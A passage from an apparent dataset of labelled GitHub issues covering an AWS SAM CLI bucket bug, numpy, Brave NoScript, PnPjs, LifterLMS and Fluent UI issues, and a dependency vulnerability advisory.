11:40:17,551 | Registering workflow 'GoDepBuilder' with capability 'Capability(language='go', dependency_manager='dep', application_framework=None)' 2021-12-17 11:40:17,553 | Registering workflow 'GoModulesBuilder' with capability 'Capability(language='go', dependency_manager='modules', application_framework=None)' 2021-12-17 11:40:17,555 | Registering workflow 'JavaGradleWorkflow' with capability 'Capability(language='java', dependency_manager='gradle', application_framework=None)' 2021-12-17 11:40:17,556 | Registering workflow 'JavaMavenWorkflow' with capability 'Capability(language='java', dependency_manager='maven', application_framework=None)' 2021-12-17 11:40:17,558 | Registering workflow 'DotnetCliPackageBuilder' with capability 'Capability(language='dotnet', dependency_manager='cli-package', application_framework=None)' 2021-12-17 11:40:17,559 | Registering workflow 'CustomMakeBuilder' with capability 'Capability(language='provided', dependency_manager=None, application_framework=None)' 2021-12-17 11:40:17,559 | Found workflow 'PythonPipBuilder' to support capabilities 'Capability(language='python', dependency_manager='pip', application_framework=None)' 2021-12-17 11:40:17,626 | Running workflow 'PythonPipBuilder' 2021-12-17 11:40:17,627 | Running PythonPipBuilder:CopySource 2021-12-17 11:40:17,629 | PythonPipBuilder:CopySource succeeded 2021-12-17 11:40:17,629 | Async execution completed 2021-12-17 11:40:17,630 | Auto creating dependency layer for each function resource into a nested stack 2021-12-17 11:40:17,630 | No Parameters detected in the template 2021-12-17 11:40:17,636 | 2 resources found in the stack sam-test 2021-12-17 11:40:17,636 | No Parameters detected in the template 2021-12-17 11:40:17,641 | Found Serverless function with name='HelloWorldFunction' and CodeUri='.aws-sam/auto-dependency-layer/HelloWorldFunction' 2021-12-17 11:40:17,641 | --base-dir is not presented, adjusting uri .aws-sam/auto-dependency-layer/HelloWorldFunction relative to /Users/luhn/Code/audit/test/template.yaml Build Succeeded Built Artifacts : .aws-sam/auto-dependency-layer Built Template : .aws-sam/auto-dependency-layer/template.yaml Commands you can use next ========================= [*] Invoke Function: sam local invoke -t .aws-sam/auto-dependency-layer/template.yaml [*] Test Function in the Cloud: sam sync --stack-name {stack-name} --watch [*] Deploy: sam deploy --guided --template-file .aws-sam/auto-dependency-layer/template.yaml 2021-12-17 11:40:17,667 | Executing the packaging using package context. 2021-12-17 11:40:18,030 | Unable to export Traceback (most recent call last): File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 114, in upload future.result() File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/futures.py", line 106, in result return self._coordinator.result() File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/futures.py", line 265, in result raise self._exception File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/tasks.py", line 126, in __call__ return self._execute_main(kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/tasks.py", line 150, in _execute_main return_value = self._main(**kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/s3transfer/upload.py", line 694, in _main client.put_object(Bucket=bucket, Key=key, Body=body, **extra_args) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/botocore/client.py", line 391, in _api_call return self._make_api_call(operation_name, kwargs) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/botocore/client.py", line 719, in _make_api_call raise error_class(parsed_response, operation_name) botocore.errorfactory.NoSuchBucket: An error occurred (NoSuchBucket) when calling the PutObject operation: The specified bucket does not exist The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/packageable_resources.py", line 126, in export self.do_export(resource_id, resource_dict, parent_dir) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/packageable_resources.py", line 148, in do_export uploaded_url = upload_local_artifacts( File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/utils.py", line 171, in upload_local_artifacts return zip_and_upload(local_path, uploader, extension) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/utils.py", line 189, in zip_and_upload return uploader.upload_with_dedup(zip_file, precomputed_md5=md5_hash, extension=extension) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 143, in upload_with_dedup return self.upload(file_name, remote_path) File "/opt/homebrew/Cellar/aws-sam-cli/1.36.0/libexec/lib/python3.8/site-packages/samcli/lib/package/s3_uploader.py", line 121, in upload raise NoSuchBucketError(bucket_name=self.bucket_name) from ex samcli.commands.package.exceptions.NoSuchBucketError: S3 Bucket does not exist. 2021-12-17 11:40:18,033 | Sending Telemetry: {'metrics': [{'commandRunExperimental': {'requestId': '2898b15c-f378-4219-b192-da75e8d8e59d', 'installationId': '1ef32602-7319-4d1a-bc65-fb2419c3fe35', 'sessionId': 'eeb5b278-0298-446b-9bcc-43424c2cd44d', 'executionEnvironment': 'CLI', 'ci': False, 'pyversion': '3.8.12', 'samcliVersion': '1.36.0', 'awsProfileProvided': False, 'debugFlagProvided': True, 'region': '', 'commandName': 'sam sync', 'metricSpecificAttributes': {'experimentalAccelerate': True, 'experimentalAll': False}, 'duration': 3225, 'exitReason': 'ExportFailedError', 'exitCode': 1}}]} 2021-12-17 11:40:18,278 | Telemetry response: 200 Error: Unable to upload artifact HelloWorldFunction referenced by CodeUri parameter of HelloWorldFunction resource. S3 Bucket does not exist. ``` ### Expected result: I would expect a) sync to honor the settings in samconfig.toml or b) a CLI flag to set the S3 bucket name. ### Additional environment details (Ex: Windows, Mac, Amazon Linux etc) 1. OS: Mac OS Monterey 2. If using SAM CLI, `sam --version`: `SAM CLI, version 1.36.0` 3. AWS region: us-west-2
main
sam sync does not support custom bucket names description i don t use the default sam bucket i have my own sam sync does not seem to support this steps to reproduce do sam init and create the zip python hello world template create the following samconfig toml toml version stack name sam test bucket mybucket prefix sam test region us west capabilities capability iam run sam build sam deploy which succeeds observed result sam sync stack name sam test gives the following output you can see it s attempting to use the default managed sam bucket telemetry endpoint configured to be telemetry endpoint configured to be sending telemetry metrics telemetry response sending telemetry metrics telemetry response using config file samconfig toml config environment default expand command line arguments to template file users luhn code audit test template yaml stack name sam test dependency layer capabilities capability named iam capability auto expand managed bucket aws sam cli managed default samclisourcebucket default capabilities applied capability named iam capability auto expand to override with customized capabilities use capabilities flag or set it in samconfig toml using build directory as aws sam auto dependency layer using build directory as aws sam auto dependency layer this feature is currently in beta visit the docs page to learn more about the aws beta terms the sam cli will use the aws lambda amazon api gateway and aws stepfunctions apis to upload your code without performing a cloudformation deployment this will cause drift in your cloudformation stack the sync command should only be used against a development stack confirm that you are synchronizing a development stack and want to turn on beta features enter y to proceed with the command or enter n to cancel  experimental features are enabled for this session visit the docs page to learn more about the aws beta terms  no parameters detected in the template stacks found in the template no parameters detected in the template resources found in the stack no parameters detected in the template found serverless function with name helloworldfunction and codeuri hello world base dir is not presented adjusting uri hello world relative to users luhn code audit test template yaml no parameters detected in the template executing the build using build context instantiating build definitions same function build definition found adding function previous builddefinition users luhn code audit test hello world zip cbff current builddefinition users luhn code audit test hello world zip function function name helloworldfunction functionname helloworldfunction runtime memory none timeout handler app lambda handler imageuri none packagetype zip imageconfig none codeuri users luhn code audit test hello world environment none rolearn none layers events helloworld type api properties path hello method get restapiid serverlessrestapi metadata none inlinecode none codesign config arn none architectures stack path async execution started invoking function functools partial running incremental build for runtime for build definition cbff waiting for async results manifest is not changed for cbff running incremental build building codeuri users luhn code audit test hello world runtime metadata architecture functions building to following folder users luhn code audit test aws sam auto dependency layer helloworldfunction loading workflow module aws lambda builders workflows registering workflow pythonpipbuilder with capability capability language python dependency manager pip application framework none registering workflow nodejsnpmbuilder with capability capability language nodejs dependency manager npm application framework none registering workflow rubybundlerbuilder with capability capability language ruby dependency manager bundler application framework none registering workflow godepbuilder with capability capability language go dependency manager dep application framework none registering workflow gomodulesbuilder with capability capability language go dependency manager modules application framework none registering workflow javagradleworkflow with capability capability language java dependency manager gradle application framework none registering workflow javamavenworkflow with capability capability language java dependency manager maven application framework none registering workflow dotnetclipackagebuilder with capability capability language dotnet dependency manager cli package application framework none registering workflow custommakebuilder with capability capability language provided dependency manager none application framework none found workflow pythonpipbuilder to support capabilities capability language python dependency manager pip application framework none running workflow pythonpipbuilder running pythonpipbuilder copysource pythonpipbuilder copysource succeeded async execution completed auto creating dependency layer for each function resource into a nested stack no parameters detected in the template resources found in the stack sam test no parameters detected in the template found serverless function with name helloworldfunction and codeuri aws sam auto dependency layer helloworldfunction base dir is not presented adjusting uri aws sam auto dependency layer helloworldfunction relative to users luhn code audit test template yaml build succeeded built artifacts aws sam auto dependency layer built template aws sam auto dependency layer template yaml commands you can use next invoke function sam local invoke t aws sam auto dependency layer template yaml test function in the cloud sam sync stack name stack name watch deploy sam deploy guided template file aws sam auto dependency layer template yaml executing the packaging using package context unable to export traceback most recent call last file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package uploader py line in upload future result file opt homebrew cellar aws sam cli libexec lib site packages futures py line in result return self coordinator result file opt homebrew cellar aws sam cli libexec lib site packages futures py line in result raise self exception file opt homebrew cellar aws sam cli libexec lib site packages tasks py line in call return self execute main kwargs file opt homebrew cellar aws sam cli libexec lib site packages tasks py line in execute main return value self main kwargs file opt homebrew cellar aws sam cli libexec lib site packages upload py line in main client put object bucket bucket key key body body extra args file opt homebrew cellar aws sam cli libexec lib site packages botocore client py line in api call return self make api call operation name kwargs file opt homebrew cellar aws sam cli libexec lib site packages botocore client py line in make api call raise error class parsed response operation name botocore errorfactory nosuchbucket an error occurred nosuchbucket when calling the putobject operation the specified bucket does not exist the above exception was the direct cause of the following exception traceback most recent call last file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package packageable resources py line in export self do export resource id resource dict parent dir file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package packageable resources py line in do export uploaded url upload local artifacts file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package utils py line in upload local artifacts return zip and upload local path uploader extension file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package utils py line in zip and upload return uploader upload with dedup zip file precomputed hash extension extension file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package uploader py line in upload with dedup return self upload file name remote path file opt homebrew cellar aws sam cli libexec lib site packages samcli lib package uploader py line in upload raise nosuchbucketerror bucket name self bucket name from ex samcli commands package exceptions nosuchbucketerror bucket does not exist sending telemetry metrics telemetry response error unable to upload artifact helloworldfunction referenced by codeuri parameter of helloworldfunction resource bucket does not exist expected result i would expect a sync to honor the settings in samconfig toml or b a cli flag to set the bucket name additional environment details ex windows mac amazon linux etc os mac os monterey if using sam cli sam version sam cli version aws region us west
1
5,936
6,102,990,535
IssuesEvent
2017-06-20 17:43:31
brave/browser-laptop
https://api.github.com/repos/brave/browser-laptop
closed
noscript allowing selective sites once doesn't invalidate the exceptions
bug feature/shields info-needed security
tested on master 1. disable scripts globally and go to https://jsfiddle.net/ 2. click noscript icon. unselect all except jsfiddle.net and hit 'allow once' 3. close tab then open jsfiddle.net again 4. click noscript icon. it appears jsfiddle.net is still allowed.
True
noscript allowing selective sites once doesn't invalidate the exceptions - tested on master 1. disable scripts globally and go to https://jsfiddle.net/ 2. click noscript icon. unselect all except jsfiddle.net and hit 'allow once' 3. close tab then open jsfiddle.net again 4. click noscript icon. it appears jsfiddle.net is still allowed.
non_main
noscript allowing selective sites once doesn t invalidate the exceptions tested on master disable scripts globally and go to click noscript icon unselect all except jsfiddle net and hit allow once close tab then open jsfiddle net again click noscript icon it appears jsfiddle net is still allowed
0
153,971
13,532,442,033
IssuesEvent
2020-09-16 00:08:30
E3SM-Project/zstash
https://api.github.com/repos/E3SM-Project/zstash
closed
Documentation versions
documentation
Find a way to have multiple versions of documentation online. Suppose version `n` is the latest release but `master` has more commits and the docs have been updated accordingly. Currently, users would see the latest docs online even though the docs describe features not included in the version they are using. Possible solution would be to just have the `index.html` point to a bulleted list of docs (v1, v2, master/merged-but-not-released-yet). We can also look into updating the documentation in `master` instead of on `gh-pages`. This would be nice because developers could update code and documentation in the same PR. However, it wouldn't solve the primary problem of needing to serve multiple versions of the docs online (unless we had users refer to the docs included in the release they download rather than looking online).
1.0
Documentation versions - Find a way to have multiple versions of documentation online. Suppose version `n` is the latest release but `master` has more commits and the docs have been updated accordingly. Currently, users would see the latest docs online even though the docs describe features not included in the version they are using. Possible solution would be to just have the `index.html` point to a bulleted list of docs (v1, v2, master/merged-but-not-released-yet). We can also look into updating the documentation in `master` instead of on `gh-pages`. This would be nice because developers could update code and documentation in the same PR. However, it wouldn't solve the primary problem of needing to serve multiple versions of the docs online (unless we had users refer to the docs included in the release they download rather than looking online).
non_main
documentation versions find a way to have multiple versions of documentation online suppose version n is the latest release but master has more commits and the docs have been updated accordingly currently users would see the latest docs online even though the docs describe features not included in the version they are using possible solution would be to just have the index html point to a bulleted list of docs master merged but not released yet we can also look into updating the documentation in master instead of on gh pages this would be nice because developers could update code and documentation in the same pr however it wouldn t solve the primary problem of needing to serve multiple versions of the docs online unless we had users refer to the docs included in the release they download rather than looking online
0
252,945
21,640,799,313
IssuesEvent
2022-05-05 18:33:57
damccorm/test-migration-target
https://api.github.com/repos/damccorm/test-migration-target
opened
Document Jenkins ghprb commands
P3 testing task
Summarize current ghprb (github pull request builder plugin) commands for people to easily find and use instead of to check each groovy file. commands includes: "retest this please", command to run specific Jenkins build (defined under .test\-infra/jenkins/job_beam_*.groovy). Imported from Jira [BEAM-3068](https://issues.apache.org/jira/browse/BEAM-3068). Original Jira may contain additional context. Reported by: markflyhigh.
1.0
Document Jenkins ghprb commands - Summarize current ghprb (github pull request builder plugin) commands for people to easily find and use instead of to check each groovy file. commands includes: "retest this please", command to run specific Jenkins build (defined under .test\-infra/jenkins/job_beam_*.groovy). Imported from Jira [BEAM-3068](https://issues.apache.org/jira/browse/BEAM-3068). Original Jira may contain additional context. Reported by: markflyhigh.
non_main
document jenkins ghprb commands summarize current ghprb github pull request builder plugin commands for people to easily find and use instead of to check each groovy file commands includes retest this please command to run specific jenkins build defined under test infra jenkins job beam groovy imported from jira original jira may contain additional context reported by markflyhigh
0
40,311
8,773,209,958
IssuesEvent
2018-12-18 16:18:24
pnp/pnpjs
https://api.github.com/repos/pnp/pnpjs
closed
ListAddResult with list name containing apostrophe
area: code status: duplicate type: enhancement
### Category - [ ] Enhancement - [X] Bug - [ ] Question - [ ] Documentation gap/issue ### Version Please specify what version of the library you are using: [1.7.0] Please specify what version(s) of SharePoint you are targeting: [ONLINE] ### Expected / Desired Behavior / Question Using _ListAddResult_ after creating list where list name contains apostrophe would contain correctly encoded list name, so that following code would work. ### Observed Behavior Currently the _url of ListAddResult contains single apostrophe causing highlighted `.expand...` code to fail. ![image](https://user-images.githubusercontent.com/6917905/50152159-94d34080-02cb-11e9-8ea1-9fb56ee38306.png) ### Steps to Reproduce 1. Create list where list name contains apostrophe using the following code where listName is e.g., "Test'4". 2. Using ListAddResult of sp.web.lists.add contains _url where apostrophes are not correctly duplicated, making the `lar.list.expand `code to fail. ``` sp.web.lists.add("Test'4", "", 100, false) .then((lar: ListAddResult) => { lar.list.expand("RootFolder").select("RootFolder/ServerRelativeUrl").get() // throws error .then((result) => { listUrl = result.RootFolder.ServerRelativeUrl; ```
1.0
ListAddResult with list name containing apostrophe - ### Category - [ ] Enhancement - [X] Bug - [ ] Question - [ ] Documentation gap/issue ### Version Please specify what version of the library you are using: [1.7.0] Please specify what version(s) of SharePoint you are targeting: [ONLINE] ### Expected / Desired Behavior / Question Using _ListAddResult_ after creating list where list name contains apostrophe would contain correctly encoded list name, so that following code would work. ### Observed Behavior Currently the _url of ListAddResult contains single apostrophe causing highlighted `.expand...` code to fail. ![image](https://user-images.githubusercontent.com/6917905/50152159-94d34080-02cb-11e9-8ea1-9fb56ee38306.png) ### Steps to Reproduce 1. Create list where list name contains apostrophe using the following code where listName is e.g., "Test'4". 2. Using ListAddResult of sp.web.lists.add contains _url where apostrophes are not correctly duplicated, making the `lar.list.expand `code to fail. ``` sp.web.lists.add("Test'4", "", 100, false) .then((lar: ListAddResult) => { lar.list.expand("RootFolder").select("RootFolder/ServerRelativeUrl").get() // throws error .then((result) => { listUrl = result.RootFolder.ServerRelativeUrl; ```
non_main
listaddresult with list name containing apostrophe category enhancement bug question documentation gap issue version please specify what version of the library you are using please specify what version s of sharepoint you are targeting expected desired behavior question using listaddresult after creating list where list name contains apostrophe would contain correctly encoded list name so that following code would work observed behavior currently the url of listaddresult contains single apostrophe causing highlighted expand code to fail steps to reproduce create list where list name contains apostrophe using the following code where listname is e g test using listaddresult of sp web lists add contains url where apostrophes are not correctly duplicated making the lar list expand code to fail sp web lists add test false then lar listaddresult lar list expand rootfolder select rootfolder serverrelativeurl get throws error then result listurl result rootfolder serverrelativeurl
0
211,868
16,373,762,097
IssuesEvent
2021-05-15 17:27:10
F-Fichter/uptime-smtp
https://api.github.com/repos/F-Fichter/uptime-smtp
opened
🛑 Test-fichtereu is down
status test-fichtereu
In [`b18c90a`](https://github.com/F-Fichter/uptime-smtp/commit/b18c90a1d06387b3abebec494a480754bf229881 ), Test-fichtereu (http://fichter.eu) was **down**: - HTTP code: 0 - Response time: 0 ms
1.0
🛑 Test-fichtereu is down - In [`b18c90a`](https://github.com/F-Fichter/uptime-smtp/commit/b18c90a1d06387b3abebec494a480754bf229881 ), Test-fichtereu (http://fichter.eu) was **down**: - HTTP code: 0 - Response time: 0 ms
non_main
🛑 test fichtereu is down in test fichtereu was down http code response time ms
0
90,185
3,812,642,609
IssuesEvent
2016-03-27 18:46:10
numpy/numpy
https://api.github.com/repos/numpy/numpy
closed
numpy.concat does not appear to work across broadcast axes (Trac #1518)
11 - Bug component: Other priority: normal
_Original ticket http://projects.scipy.org/numpy/ticket/1518 on 2010-06-22 by trac user eob, assigned to unknown._ When I'm trying to concatenate two tensors together, the concatenate operation does not allow me to use broadcast dimensions (using newaxis) in one of them.
1.0
numpy.concat does not appear to work across broadcast axes (Trac #1518) - _Original ticket http://projects.scipy.org/numpy/ticket/1518 on 2010-06-22 by trac user eob, assigned to unknown._ When I'm trying to concatenate two tensors together, the concatenate operation does not allow me to use broadcast dimensions (using newaxis) in one of them.
non_main
numpy concat does not appear to work across broadcast axes trac original ticket on by trac user eob assigned to unknown when i m trying to concatenate two tensors together the concatenate operation does not allow me to use broadcast dimensions using newaxis in one of them
0
86,633
10,512,543,923
IssuesEvent
2019-09-27 18:11:05
gocodebox/lifterlms-rest
https://api.github.com/repos/gocodebox/lifterlms-rest
closed
Delete student enrollment requires change to enrollment status
language: php status: assigned type: bug type: documentation
If a `DELETE /students/{id}/enrollments/{post_id}` operation is performed on a membership enrollment with a status of `enrolled`, the student report page still displays a membership but with a blank status and enrolled column. If a `PATCH /students/{id}/enrollments/{post_id}` operation changes the `status` to `cancelled` before the `DELETE` operation, the enrollment is correctly removed from the student report page. @eri-trabiccolo suggests two posibilities: 1. we check the enrollment status before deleting and if active we return an error with instructions on what to do before 1. always unenroll before deleting Another option is: 3. Add a note to the `DELETE /students/{id}/enrollments/{post_id}` spec about the need to change the enrollment status first.
1.0
Delete student enrollment requires change to enrollment status - If a `DELETE /students/{id}/enrollments/{post_id}` operation is performed on a membership enrollment with a status of `enrolled`, the student report page still displays a membership but with a blank status and enrolled column. If a `PATCH /students/{id}/enrollments/{post_id}` operation changes the `status` to `cancelled` before the `DELETE` operation, the enrollment is correctly removed from the student report page. @eri-trabiccolo suggests two posibilities: 1. we check the enrollment status before deleting and if active we return an error with instructions on what to do before 1. always unenroll before deleting Another option is: 3. Add a note to the `DELETE /students/{id}/enrollments/{post_id}` spec about the need to change the enrollment status first.
non_main
delete student enrollment requires change to enrollment status if a delete students id enrollments post id operation is performed on a membership enrollment with a status of enrolled the student report page still displays a membership but with a blank status and enrolled column if a patch students id enrollments post id operation changes the status to cancelled before the delete operation the enrollment is correctly removed from the student report page eri trabiccolo suggests two posibilities we check the enrollment status before deleting and if active we return an error with instructions on what to do before always unenroll before deleting another option is add a note to the delete students id enrollments post id spec about the need to change the enrollment status first
0
220,436
24,565,030,497
IssuesEvent
2022-10-13 01:36:12
appvantageasia/starter-kit
https://api.github.com/repos/appvantageasia/starter-kit
opened
mjml-4.13.0.tgz: 1 vulnerabilities (highest severity is: 5.5)
security vulnerability
<details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>mjml-4.13.0.tgz</b></p></summary> <p></p> <p> </details> ## Vulnerabilities | CVE | Severity | <img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS | Dependency | Type | Fixed in | Remediation Available | | ------------- | ------------- | ----- | ----- | ----- | --- | --- | | [CVE-2022-37609](https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37609) | <img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Medium | 5.5 | js-beautify-1.14.3.tgz | Transitive | N/A | &#10060; | ## Details <details> <summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> CVE-2022-37609</summary> ### Vulnerable Library - <b>js-beautify-1.14.3.tgz</b></p> <p>beautifier.io for node</p> <p>Library home page: <a href="https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.3.tgz">https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.3.tgz</a></p> <p> Dependency Hierarchy: - mjml-4.13.0.tgz (Root Library) - mjml-migrate-4.13.0.tgz - :x: **js-beautify-1.14.3.tgz** (Vulnerable Library) <p>Found in base branch: <b>next</b></p> </p> <p></p> ### Vulnerability Details <p> Prototype pollution vulnerability in beautify-web js-beautify 1.13.7 via the name variable in options.js. <p>Publish Date: 2022-10-11 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37609>CVE-2022-37609</a></p> </p> <p></p> ### CVSS 3 Score Details (<b>5.5</b>) <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> <p></p> Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) </details>
True
mjml-4.13.0.tgz: 1 vulnerabilities (highest severity is: 5.5) - <details><summary><img src='https://whitesource-resources.whitesourcesoftware.com/vulnerability_details.png' width=19 height=20> Vulnerable Library - <b>mjml-4.13.0.tgz</b></p></summary> <p></p> <p> </details> ## Vulnerabilities | CVE | Severity | <img src='https://whitesource-resources.whitesourcesoftware.com/cvss3.png' width=19 height=20> CVSS | Dependency | Type | Fixed in | Remediation Available | | ------------- | ------------- | ----- | ----- | ----- | --- | --- | | [CVE-2022-37609](https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37609) | <img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> Medium | 5.5 | js-beautify-1.14.3.tgz | Transitive | N/A | &#10060; | ## Details <details> <summary><img src='https://whitesource-resources.whitesourcesoftware.com/medium_vul.png' width=19 height=20> CVE-2022-37609</summary> ### Vulnerable Library - <b>js-beautify-1.14.3.tgz</b></p> <p>beautifier.io for node</p> <p>Library home page: <a href="https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.3.tgz">https://registry.npmjs.org/js-beautify/-/js-beautify-1.14.3.tgz</a></p> <p> Dependency Hierarchy: - mjml-4.13.0.tgz (Root Library) - mjml-migrate-4.13.0.tgz - :x: **js-beautify-1.14.3.tgz** (Vulnerable Library) <p>Found in base branch: <b>next</b></p> </p> <p></p> ### Vulnerability Details <p> Prototype pollution vulnerability in beautify-web js-beautify 1.13.7 via the name variable in options.js. <p>Publish Date: 2022-10-11 <p>URL: <a href=https://vuln.whitesourcesoftware.com/vulnerability/CVE-2022-37609>CVE-2022-37609</a></p> </p> <p></p> ### CVSS 3 Score Details (<b>5.5</b>) <p> Base Score Metrics: - Exploitability Metrics: - Attack Vector: Local - Attack Complexity: Low - Privileges Required: None - User Interaction: Required - Scope: Unchanged - Impact Metrics: - Confidentiality Impact: None - Integrity Impact: None - Availability Impact: High </p> For more information on CVSS3 Scores, click <a href="https://www.first.org/cvss/calculator/3.0">here</a>. </p> <p></p> Step up your Open Source Security Game with Mend [here](https://www.whitesourcesoftware.com/full_solution_bolt_github) </details>
non_main
mjml tgz vulnerabilities highest severity is vulnerable library mjml tgz vulnerabilities cve severity cvss dependency type fixed in remediation available medium js beautify tgz transitive n a details cve vulnerable library js beautify tgz beautifier io for node library home page a href dependency hierarchy mjml tgz root library mjml migrate tgz x js beautify tgz vulnerable library found in base branch next vulnerability details prototype pollution vulnerability in beautify web js beautify via the name variable in options js publish date url a href cvss score details base score metrics exploitability metrics attack vector local attack complexity low privileges required none user interaction required scope unchanged impact metrics confidentiality impact none integrity impact none availability impact high for more information on scores click a href step up your open source security game with mend
0
3,855
17,017,525,001
IssuesEvent
2021-07-02 14:03:27
obs-websocket-community-projects/obs-websocket-java
https://api.github.com/repos/obs-websocket-community-projects/obs-websocket-java
opened
Examples Dir
5.X.X Support maintainability
Rather than providing examples in the README, we could provide a small examples module/directory showing how to use the client for some common use cases: - Connect (waiting for ready), then making a call - Making requests directly (rather than via convenience methods) - Disconnect and reconnect - etc as requested (adding new examples could be tied directly to discussions or issues)
True
Examples Dir - Rather than providing examples in the README, we could provide a small examples module/directory showing how to use the client for some common use cases: - Connect (waiting for ready), then making a call - Making requests directly (rather than via convenience methods) - Disconnect and reconnect - etc as requested (adding new examples could be tied directly to discussions or issues)
main
examples dir rather than providing examples in the readme we could provide a small examples module directory showing how to use the client for some common use cases connect waiting for ready then making a call making requests directly rather than via convenience methods disconnect and reconnect etc as requested adding new examples could be tied directly to discussions or issues
1
893
18,460,057,547
IssuesEvent
2021-10-15 23:00:09
microsoft/fluentui
https://api.github.com/repos/microsoft/fluentui
closed
PeoplePicker - NormalPeoplePicker - Android talkback incorrect focus order when trying to select a suggestion
Component: PeoplePicker Needs: Investigation Fluent UI react (v8) Resolution: Soft Close
### Environment Information - **Package version(s)**: 7.158.3 - **Browser and OS versions**: Android OS 10, Pixel 3a/Chrome Browser 86.0.4240.198 ### Describe the issue: ### Please provide a reproduction of the issue in a codepen: 1. https://codepen.io/kestill/pen/dyOWEKg 2. Press textbox to open suggestions menu 3. Swipe right and observe talkback focus #### Actual behavior: After suggestions are shown, swipe right then talkback focus will land on first element of Chrome web page. #### Expected behavior: After suggestions available when user swipe right focus should be on 'first suggestion' and Talkback should announce 'first suggestion'. ### Documentation describing expected behavior MAS Reference: [MAS 2.4.3 - Focus Order](https://microsoft.sharepoint.com/:w:/r/teams/msenable/_layouts/15/WopiFrame2.aspx?sourcedoc=%7b0de7fbe1-ad7e-48e5-bcbb-8d986691e2b9%7d)
1.0
PeoplePicker - NormalPeoplePicker - Android talkback incorrect focus order when trying to select a suggestion - ### Environment Information - **Package version(s)**: 7.158.3 - **Browser and OS versions**: Android OS 10, Pixel 3a/Chrome Browser 86.0.4240.198 ### Describe the issue: ### Please provide a reproduction of the issue in a codepen: 1. https://codepen.io/kestill/pen/dyOWEKg 2. Press textbox to open suggestions menu 3. Swipe right and observe talkback focus #### Actual behavior: After suggestions are shown, swipe right then talkback focus will land on first element of Chrome web page. #### Expected behavior: After suggestions available when user swipe right focus should be on 'first suggestion' and Talkback should announce 'first suggestion'. ### Documentation describing expected behavior MAS Reference: [MAS 2.4.3 - Focus Order](https://microsoft.sharepoint.com/:w:/r/teams/msenable/_layouts/15/WopiFrame2.aspx?sourcedoc=%7b0de7fbe1-ad7e-48e5-bcbb-8d986691e2b9%7d)
non_main
peoplepicker normalpeoplepicker android talkback incorrect focus order when trying to select a suggestion environment information package version s browser and os versions android os pixel chrome browser describe the issue please provide a reproduction of the issue in a codepen press textbox to open suggestions menu swipe right and observe talkback focus actual behavior after suggestions are shown swipe right then talkback focus will land on first element of chrome web page expected behavior after suggestions available when user swipe right focus should be on first suggestion and talkback should announce first suggestion documentation describing expected behavior mas reference
0